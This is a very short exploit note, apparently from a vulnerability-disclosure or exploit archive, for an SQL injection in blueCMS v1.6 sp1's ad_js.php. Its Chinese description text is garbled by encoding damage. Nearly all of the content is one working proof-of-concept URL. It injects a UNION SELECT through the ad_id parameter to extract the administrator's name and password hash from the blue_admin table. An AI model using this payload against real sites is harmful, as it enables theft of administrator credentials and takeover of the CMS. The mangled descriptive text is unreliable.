blueCMS v1.6 sp1 ad_js.php SQLע©


©֤

http://localhost/cms/ad_js.php?ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,concat(admin_name,0x7C0D0A,pwd),concat(admin_name,0x7C0D0A,pwd)%20from%20blue_admin%20where%20admin_id=1
 
Ҽ鿴Դõݡ
